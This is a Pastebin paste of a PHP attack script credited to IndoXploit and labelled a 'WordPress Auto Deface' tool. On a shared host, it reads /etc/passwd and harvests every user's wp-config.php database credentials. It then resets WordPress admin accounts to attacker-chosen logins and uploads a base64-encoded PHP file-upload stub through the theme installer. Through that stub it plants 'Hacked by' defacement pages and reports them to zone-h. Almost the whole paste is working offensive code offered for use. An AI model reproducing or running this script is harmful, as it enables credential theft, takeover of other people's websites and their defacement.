Guest User

Untitled

a guest
Sep 5th, 2018
186
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.61 KB | None | 0 0
  1. <?php
  2. //how to use : https://www.youtube.com/watch?v=q72Rp8QM4xI
  3. //Tu5b0l3d
  4. //IndoXploit
  5. //http://indoxploit.blogspot.com/ - linuxsec.org
  6. error_reporting(0);
  7. $zh = "GR0V"; // zone-h nick
  8. $jembut = "jack"; // add username wordpress
  9. $jembut2 = "linuxsec"; // add password wordpress
  10. $kontol = "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by GR0V<p style='color: transparent'><title>Hacked by GR0V</title>"; // script deface
  11.  
  12. ######################################################################
  13. // script di bawah tidak perlu di otak atik
  14. // jangan pernah mengubah nama file ( k.php ) dan ( m.php ) , atau auto deface tidak akan berjalan
  15. echo "<body bgcolor=black>";
  16. echo "<font color=green>";
  17. echo "<title>IndoXploit WordPress Auto Deface</title>";
  18. cover("IndoXploit");
  19.  
  20. function save($data){
  21. $fp = @fopen("indo.htm", "a") or die("cant open file");
  22. fwrite($fp, $data);
  23. fclose($fp);
  24. }
  25.  
  26. function anucurl($sites){
  27. $ch1 = curl_init ("$sites");
  28. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  29. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  30. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  31. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
  32. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  33. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  34. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  35. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  36. $data = curl_exec ($ch1);
  37. return $data;
  38. }
  39.  
  40. function lohgin($cek, $web, $userr, $pass){
  41. $post = array(
  42. "log" => "$userr",
  43. "pwd" => "$pass",
  44. "rememberme" => "forever",
  45. "wp-submit" => "Log In",
  46. "redirect_to" => "$web/wp-admin/",
  47. "testcookie" => "1",
  48. );
  49. $ch = curl_init ("$cek");
  50. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  51. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  52. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  53. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  54. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  55. curl_setopt ($ch, CURLOPT_POST, 1);
  56. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  57. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  58. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  59. $data6 = curl_exec ($ch);
  60. return $data6;
  61. }
  62.  
  63. function cover($indoXploit){
  64. echo "<center><font size='5px'> WordPress Auto Deface Coded by $indoXploit</font><br>";
  65. echo "Deface Result : <a href='indo.htm' style='text-decoration: none'>indo.htm</a></center><br><br><br>";
  66. }
  67.  
  68. function ambilKata($param, $kata1, $kata2){
  69. if(strpos($param, $kata1) === FALSE) return FALSE;
  70. if(strpos($param, $kata2) === FALSE) return FALSE;
  71. $start = strpos($param, $kata1) + strlen($kata1);
  72. $end = strpos($param, $kata2, $start);
  73. $return = substr($param, $start, $end - $start);
  74. return $return;
  75. }
  76.  
  77.  
  78. $a = file_get_contents('/etc/passwd');
  79. preg_match_all('/(.*?):x:/', $a, $data);
  80. foreach($data[1] as $user){
  81. $baca = file_get_contents("/home/$user/public_html/wp-config.php");
  82.  
  83. /* symlink('/home/'.$user.'/public_html/wp-config.php',$user.'- config.txt'); */
  84.  
  85. if($baca!=""){
  86.  
  87.  
  88. /* $b = `cp /home/$user/public_html/index.php $user-index.txt`; */
  89.  
  90. $file1 = "$user-config.txt";
  91. $fp2 = fopen($file1,"w");
  92. fputs($fp2,$baca);
  93.  
  94. $file = @file_get_contents($file1);
  95.  
  96.  
  97. echo $user."-> sukses<br>";
  98. $host = ambilkata($file,"DB_HOST', '","'");
  99. $username = ambilkata($file,"DB_USER', '","'");
  100. $password = ambilkata($file,"DB_PASSWORD', '","'");
  101. $db = ambilkata($file,"DB_NAME', '","'");
  102. $dbprefix = ambilkata($file,"table_prefix = '","'");
  103. $user_baru = $jembut;
  104. $password_baru = $jembut2;
  105. $prefix = $db.".".$dbprefix."users";
  106. $sue = $db.".".$dbprefix."options";
  107. $pass = md5("$password_baru");
  108. $nick = $kontol;
  109.  
  110. echo "# Db Host: $host<br>";
  111. echo "# Db user: $username<br>";
  112. echo "# Db Password: $password<br>";
  113. echo "# Db name: $db<br>";
  114. echo "# Table_Prefix: $dbprefix<br>";
  115.  
  116. mysql_connect($host,$username,$password);
  117.  
  118. mysql_select_db($db);
  119.  
  120. $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  121. $r=mysql_fetch_array($tampil);
  122. $id = $r[ID];
  123.  
  124. $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
  125. $r2=mysql_fetch_array($tampil2);
  126. $target = $r2[option_value];
  127. echo "# $target<br>";
  128.  
  129.  
  130. mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
  131.  
  132. $site= "$target/wp-login.php";
  133. $site2= "$target/wp-admin/theme-install.php?upload";
  134. $a = lohgin($site, $target, $user_baru, $password_baru);
  135. $b = lohgin($site2, $target, $user_baru, $password_baru);
  136.  
  137.  
  138. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  139. echo "# token -> $anu2<br>";
  140.  
  141.  
  142. $upload3 = base64_decode("PD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  143.  
  144. $www = "m.php";
  145. $fp5 = fopen($www,"w");
  146. fputs($fp5,$upload3);
  147.  
  148. $c = file_get_contents($w);
  149.  
  150. $post2 = array(
  151. "_wpnonce" => "$anu2",
  152. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  153. "themezip" => "@m.php",
  154. "install-theme-submit" => "Install Now",
  155. );
  156. $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
  157. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  158. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  159. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  160. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  161. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  162. curl_setopt ($ch, CURLOPT_POST, 1);
  163. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
  164. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  165. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  166. $data3 = curl_exec ($ch);
  167.  
  168. $namafile = "wew.php";
  169. $fp2 = fopen($namafile,"w");
  170. fputs($fp2,$nick);
  171.  
  172. $y = date("Y");
  173. $m = date("m");
  174.  
  175.  
  176. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
  177. curl_setopt($ch6, CURLOPT_POST, true);
  178. curl_setopt($ch6, CURLOPT_POSTFIELDS,
  179. array('file3'=>"@$namafile"));
  180. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  181. curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
  182. $postResult = curl_exec($ch6);
  183. curl_close($ch6);
  184.  
  185. $as = "$target/k.php";
  186. $bs = file_get_contents($as);
  187. if(preg_match("#hacked#si",$bs)){
  188. echo "[+] <font color='cyan'>Deface success..<br>";
  189. echo "[+] $as<br>";
  190. save($as."<br>");
  191. echo "[+] zone-h: ";
  192. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  193. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  194. curl_setopt ($ch3, CURLOPT_POST, 1);
  195. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$zh&domain1=$as&hackmode=1&reason=1");
  196.  
  197. if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  198. echo " Ok <br><br>";
  199. }else{
  200. echo " No <br><br></font>";}
  201. }
  202. else{
  203. echo "[!] <font color='red'>Deface Failed..<br>";
  204. echo "[!] Try manual deface at : <br>";
  205. echo "[!] $target/wp-login.php<br>";
  206. echo "[!] username: $user_baru<br>";
  207. echo "[!] password: $password_baru<br><br><br></font>";
  208.  
  209.  
  210. }
  211. }
  212. else{
  213. echo "$user <= No<br>";
  214. }
  215.  
  216.  
  217.  
  218. }
  219.  
  220.  
  221. ?>
Add Comment
Please, Sign In to add comment